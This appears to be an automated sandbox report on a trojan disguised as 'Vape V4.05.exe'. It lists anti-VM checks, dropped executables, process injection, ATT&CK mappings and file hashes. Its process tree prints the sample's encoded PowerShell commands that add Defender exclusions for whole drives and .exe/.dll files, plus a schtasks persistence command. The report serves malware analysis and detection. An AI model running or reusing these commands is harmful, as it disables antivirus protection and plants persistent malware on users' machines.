829e4cdc3b9823f5967f4d84c0a5f0e654e95760d09eb5de9c9ad91544dc9478

Resubmissions

17-02-2022 14:46

220217-r5dpmacedn 10

17-02-2022 07:27

220217-h98k5aaeg8 10

Analysis

max time kernel
145s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
17-02-2022 14:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Vape V4.05.exe
Size

13.9MB
MD5

b26285219a7d20505e4a8628fe4092f2
SHA1

9b0109eb2e0fd5a401820262fe9a8272600685b1
SHA256

829e4cdc3b9823f5967f4d84c0a5f0e654e95760d09eb5de9c9ad91544dc9478
SHA512

da09d8e018d77c5cd4d56afc03b4228fdf5a9dbca0294c41f2808a7f106ad118253b895db87f6f6461b11830401e07e304c92572a0678bdb390e5e9b67cbe7d3

Score

10^/10

evasion themida trojan

Malware Config

Signatures

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 1700 created 4912 1700 WerFault.exe Vape_V4.exe

description	pid	process	target process
PID 1700 created 4912	1700	WerFault.exe	Vape_V4.exe

evasion 1 IoCs

evasion.

evasion

Processes:

resource	yara_rule
behavioral2/memory/4840-130-0x0000000000400000-0x00000000015DC000-memory.dmp	evasion

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Executes dropped EXE 4 IoCs

Processes:

syn conhost.exeVape_V4.exeservices32.exesihost64.exe

pid process

1944 syn conhost.exe
4912 Vape_V4.exe
3224 services32.exe
1784 sihost64.exe

pid	process
1944	syn conhost.exe
4912	Vape_V4.exe
3224	services32.exe
1784	sihost64.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Vape_V4.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Vape_V4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Vape_V4.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Vape_V4.exeservices32.exeVape V4.05.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Vape_V4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	services32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Vape V4.05.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe	themida
C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Vape_V4.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Vape_V4.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

Vape V4.05.exeVape_V4.exe

pid process

4840 Vape V4.05.exe
4840 Vape V4.05.exe
4912 Vape_V4.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Vape_V4.exe

pid	process
4840	Vape V4.05.exe
4840	Vape V4.05.exe
4912	Vape_V4.exe

Drops file in Windows directory 8 IoCs

Processes:

svchost.exeTiWorker.exe

description	ioc	process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe
File opened for modification	C:\Windows\WinSxS\pending.xml	TiWorker.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2728 4912 WerFault.exe Vape_V4.exe

pid	pid_target	process	target process
2728	4912	WerFault.exe	Vape_V4.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3692 schtasks.exe

pid	process
3692	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exeVape_V4.exeWerFault.exepowershell.exesyn conhost.exepowershell.exepowershell.exeservices32.exe

pid	process
4780	powershell.exe
4912	Vape_V4.exe
4912	Vape_V4.exe
4912	Vape_V4.exe
4912	Vape_V4.exe
4780	powershell.exe
2728	WerFault.exe
2728	WerFault.exe
3776	powershell.exe
3776	powershell.exe
1944	syn conhost.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
1908	powershell.exe
1908	powershell.exe
1908	powershell.exe
3224	services32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeVape_V4.exepowershell.exesyn conhost.exesvchost.exeTiWorker.exepowershell.exepowershell.exeservices32.exe

description	pid	process
Token: SeDebugPrivilege	4780	powershell.exe
Token: SeDebugPrivilege	4912	Vape_V4.exe
Token: SeDebugPrivilege	3776	powershell.exe
Token: SeDebugPrivilege	1944	syn conhost.exe
Token: SeShutdownPrivilege	1496	svchost.exe
Token: SeCreatePagefilePrivilege	1496	svchost.exe
Token: SeShutdownPrivilege	1496	svchost.exe
Token: SeCreatePagefilePrivilege	1496	svchost.exe
Token: SeShutdownPrivilege	1496	svchost.exe
Token: SeCreatePagefilePrivilege	1496	svchost.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeDebugPrivilege	2416	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	3224	services32.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe
Token: SeBackupPrivilege	4500	TiWorker.exe
Token: SeRestorePrivilege	4500	TiWorker.exe
Token: SeSecurityPrivilege	4500	TiWorker.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Vape V4.05.exe

pid process

4840 Vape V4.05.exe

pid	process
4840	Vape V4.05.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

Vape V4.05.exesyn conhost.execmd.exeWerFault.execmd.execmd.exeservices32.execmd.exe

description	pid	process	target process
PID 4840 wrote to memory of 1944	4840	Vape V4.05.exe	syn conhost.exe
PID 4840 wrote to memory of 1944	4840	Vape V4.05.exe	syn conhost.exe
PID 4840 wrote to memory of 4912	4840	Vape V4.05.exe	Vape_V4.exe
PID 4840 wrote to memory of 4912	4840	Vape V4.05.exe	Vape_V4.exe
PID 1944 wrote to memory of 2284	1944	syn conhost.exe	cmd.exe
PID 1944 wrote to memory of 2284	1944	syn conhost.exe	cmd.exe
PID 2284 wrote to memory of 4780	2284	cmd.exe	powershell.exe
PID 2284 wrote to memory of 4780	2284	cmd.exe	powershell.exe
PID 1700 wrote to memory of 4912	1700	WerFault.exe	Vape_V4.exe
PID 1700 wrote to memory of 4912	1700	WerFault.exe	Vape_V4.exe
PID 2284 wrote to memory of 3776	2284	cmd.exe	powershell.exe
PID 2284 wrote to memory of 3776	2284	cmd.exe	powershell.exe
PID 1944 wrote to memory of 5112	1944	syn conhost.exe	cmd.exe
PID 1944 wrote to memory of 5112	1944	syn conhost.exe	cmd.exe
PID 5112 wrote to memory of 3692	5112	cmd.exe	schtasks.exe
PID 5112 wrote to memory of 3692	5112	cmd.exe	schtasks.exe
PID 1944 wrote to memory of 2776	1944	syn conhost.exe	cmd.exe
PID 1944 wrote to memory of 2776	1944	syn conhost.exe	cmd.exe
PID 2776 wrote to memory of 3224	2776	cmd.exe	services32.exe
PID 2776 wrote to memory of 3224	2776	cmd.exe	services32.exe
PID 3224 wrote to memory of 2716	3224	services32.exe	cmd.exe
PID 3224 wrote to memory of 2716	3224	services32.exe	cmd.exe
PID 2716 wrote to memory of 2416	2716	cmd.exe	powershell.exe
PID 2716 wrote to memory of 2416	2716	cmd.exe	powershell.exe
PID 2716 wrote to memory of 1908	2716	cmd.exe	powershell.exe
PID 2716 wrote to memory of 1908	2716	cmd.exe	powershell.exe
PID 3224 wrote to memory of 1784	3224	services32.exe	sihost64.exe
PID 3224 wrote to memory of 1784	3224	services32.exe	sihost64.exe

C:\Users\Admin\AppData\Local\Temp\Vape V4.05.exe
"C:\Users\Admin\AppData\Local\Temp\Vape V4.05.exe"
1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4840

C:\Users\Admin\AppData\Local\Temp\syn conhost.exe
"C:\Users\Admin\AppData\Local\Temp\syn conhost.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1944

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3776

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:5112

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe"
4⤵
- Creates scheduled task(s)
PID:3692

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2776

C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe
C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3224

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:2716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
5⤵
- Executes dropped EXE
PID:1784

C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe
"C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4912

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4912 -s 680
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2728

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 4912 -ip 4912
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4500

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e5663972c1caaba7088048911c758bf3

SHA1
3462dea0f9c2c16a9c3afdaef8bbb1f753c1c198

SHA256
9f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e

SHA512
ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
51cf8df21f531e31f7740b4ec487a48a

SHA1
40c6a73b22d71625a62df109aefc92a5f9b9d13e

SHA256
263d9b98a897d1d66da4832af640c4bf5ab0ae91125ba12243453dfe714f3d0d

SHA512
57a85461f6ea96b26a8b53d3a9cca18543e4ddbe996e8f412fc4cf7cf6e9ffe558c96da7b322a42f18bef62020e65aee119bed6102f75e2f605df09b02ec6368

Download Submit
C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe
MD5
7407fd99ee1940051b4f543656ea9b0a

SHA1
7149b25db501b75111ac77fe4bcfe6915058757a

SHA256
bef628b23396d36849beac1bf633859d02f82ae9dc877281862b7e9e85148ecd

SHA512
804a257e128f54d5febaca7424f308403e092f773119075270b89d8721e9cc91e3b7adc402ad9a9fbb252b5af250745d2f6a34f523f30b1f08c212aea0e5b75d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe
MD5
7407fd99ee1940051b4f543656ea9b0a

SHA1
7149b25db501b75111ac77fe4bcfe6915058757a

SHA256
bef628b23396d36849beac1bf633859d02f82ae9dc877281862b7e9e85148ecd

SHA512
804a257e128f54d5febaca7424f308403e092f773119075270b89d8721e9cc91e3b7adc402ad9a9fbb252b5af250745d2f6a34f523f30b1f08c212aea0e5b75d

Download Submit
C:\Users\Admin\AppData\Local\Temp\syn conhost.exe
MD5
8d219ec4b3221c9e18f05d663b245a7b

SHA1
08f956878fa7144d425a7be049d172ce743424d4

SHA256
15090f836230310f9074d7a296e428f70a2335f7668e844757244930a55f0ff8

SHA512
db1e78181e9a3dfff5d43e3fd398534c227fea318e83919cad819c374b744677f83e95733dc5c3633f1baccea503d86baf8ee22f9f7c3ccc6e581d5aef42b80f

Download Submit
C:\Users\Admin\AppData\Local\Temp\syn conhost.exe
MD5
8d219ec4b3221c9e18f05d663b245a7b

SHA1
08f956878fa7144d425a7be049d172ce743424d4

SHA256
15090f836230310f9074d7a296e428f70a2335f7668e844757244930a55f0ff8

SHA512
db1e78181e9a3dfff5d43e3fd398534c227fea318e83919cad819c374b744677f83e95733dc5c3633f1baccea503d86baf8ee22f9f7c3ccc6e581d5aef42b80f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
MD5
e83a53213ee5593da07c3da2fa6e53c4

SHA1
230cd2f92bfcb38a727209a0ed14272aec969a59

SHA256
8bb79f322069a21f06ceb8916aef6dddeb7934c25ef35b8a38b918491d648c66

SHA512
dd667fc2fcbe26547d16cc9a6ce18e55c57c62cee1bd365ebef17e88d0f0694bec69921179433b06fa89569d7b52f064b8ba0cc8b2fab3e13cb4b089b9b3e1dc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
MD5
e83a53213ee5593da07c3da2fa6e53c4

SHA1
230cd2f92bfcb38a727209a0ed14272aec969a59

SHA256
8bb79f322069a21f06ceb8916aef6dddeb7934c25ef35b8a38b918491d648c66

SHA512
dd667fc2fcbe26547d16cc9a6ce18e55c57c62cee1bd365ebef17e88d0f0694bec69921179433b06fa89569d7b52f064b8ba0cc8b2fab3e13cb4b089b9b3e1dc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe
MD5
8d219ec4b3221c9e18f05d663b245a7b

SHA1
08f956878fa7144d425a7be049d172ce743424d4

SHA256
15090f836230310f9074d7a296e428f70a2335f7668e844757244930a55f0ff8

SHA512
db1e78181e9a3dfff5d43e3fd398534c227fea318e83919cad819c374b744677f83e95733dc5c3633f1baccea503d86baf8ee22f9f7c3ccc6e581d5aef42b80f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe
MD5
8d219ec4b3221c9e18f05d663b245a7b

SHA1
08f956878fa7144d425a7be049d172ce743424d4

SHA256
15090f836230310f9074d7a296e428f70a2335f7668e844757244930a55f0ff8

SHA512
db1e78181e9a3dfff5d43e3fd398534c227fea318e83919cad819c374b744677f83e95733dc5c3633f1baccea503d86baf8ee22f9f7c3ccc6e581d5aef42b80f

Download Submit
memory/1496-152-0x000001EF61D70000-0x000001EF61D80000-memory.dmp

Filesize
64KB

Download
memory/1496-154-0x000001EF649F0000-0x000001EF649F4000-memory.dmp

Filesize
16KB

Download
memory/1496-153-0x000001EF62320000-0x000001EF62330000-memory.dmp

Filesize
64KB

Download
memory/1784-169-0x000000001DB80000-0x000000001DB82000-memory.dmp

Filesize
8KB

Download
memory/1784-167-0x0000000000A80000-0x0000000000A86000-memory.dmp

Filesize
24KB

Download
memory/1784-168-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmp

Filesize
8KB

Download
memory/1944-137-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmp

Filesize
8KB

Download
memory/1944-139-0x000000001DD30000-0x000000001DD32000-memory.dmp

Filesize
8KB

Download
memory/1944-134-0x0000000001450000-0x0000000001462000-memory.dmp

Filesize
72KB

Download
memory/1944-133-0x0000000000940000-0x0000000000B2E000-memory.dmp

Filesize
1.9MB

Download
memory/2416-161-0x000002343FAA0000-0x000002343FAA2000-memory.dmp

Filesize
8KB

Download
memory/2416-160-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmp

Filesize
8KB

Download
memory/2416-162-0x000002343FAA3000-0x000002343FAA5000-memory.dmp

Filesize
8KB

Download
memory/2416-163-0x000002343FAA6000-0x000002343FAA8000-memory.dmp

Filesize
8KB

Download
memory/3224-158-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmp

Filesize
8KB

Download
memory/3224-159-0x000000001E130000-0x000000001E132000-memory.dmp

Filesize
8KB

Download
memory/3776-150-0x000001CCE5126000-0x000001CCE5128000-memory.dmp

Filesize
8KB

Download
memory/3776-151-0x000001CCE5128000-0x000001CCE5129000-memory.dmp

Filesize
4KB

Download
memory/3776-148-0x000001CCE5120000-0x000001CCE5122000-memory.dmp

Filesize
8KB

Download
memory/3776-149-0x000001CCE5123000-0x000001CCE5125000-memory.dmp

Filesize
8KB

Download
memory/3776-147-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmp

Filesize
8KB

Download
memory/4780-144-0x000001FB4C876000-0x000001FB4C878000-memory.dmp

Filesize
8KB

Download
memory/4780-143-0x000001FB4C873000-0x000001FB4C875000-memory.dmp

Filesize
8KB

Download
memory/4780-142-0x000001FB4C870000-0x000001FB4C872000-memory.dmp

Filesize
8KB

Download
memory/4780-141-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmp

Filesize
8KB

Download
memory/4780-138-0x000001FB4C7E0000-0x000001FB4C802000-memory.dmp

Filesize
136KB

Download
memory/4840-130-0x0000000000400000-0x00000000015DC000-memory.dmp

Filesize
17.9MB

Download
memory/4912-140-0x00007FFC20410000-0x00007FFC20412000-memory.dmp

Filesize
8KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads